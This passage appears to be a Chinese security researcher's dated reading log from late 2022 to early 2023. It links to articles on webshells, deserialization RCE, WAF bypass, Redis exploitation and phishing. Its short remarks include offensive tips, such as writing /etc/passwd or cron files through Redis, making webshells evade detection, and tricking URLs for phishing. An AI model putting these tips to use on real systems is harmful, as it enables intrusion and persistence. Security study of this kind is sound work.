插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** ++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** ++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) ++ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** ++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) ++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** ++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** ++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** ++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** ++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** ++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** ++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** ++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** ++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** ++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** ++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* ++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) ++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) ++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 ++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** ++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** ++ 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) ++ 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** ++ 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** ++ 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** ++ [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** ++ 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** ++ 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** ++ 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) ++ 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** ++ 2022/12/28 [Android 远程攻击面——WebView 攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** ++ 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** ++ 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** ++ 2022/12/31 嗯其实没有看什么文章主要是在写代码,还是假装记录一下。新年快乐!!! + +## 2023 ++ 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** ++ 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** ++ 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** ++ 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) ++ 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** ++ 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** ++ 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** ++ 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** ++ 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** ++ 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) ++ 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** ++ 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) ++ 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** ++ 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) ++ 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** ++ 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** ++ 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** ++ 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** ++ 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** ++ 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** ++ 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** ++ 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** ++ 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) ++ 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** ++ 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** ++ 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** ++ 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** ++ 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) ++ 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) ++ 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** ++ 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** ++ 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** ++ 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** ++ 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** ++ 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** ++ 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** ++ 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** ++ 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) ++ 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) ++ 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) ++ 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) ++ 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) ++ 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce ++ 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) ++ 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** ++ 2023/03/12 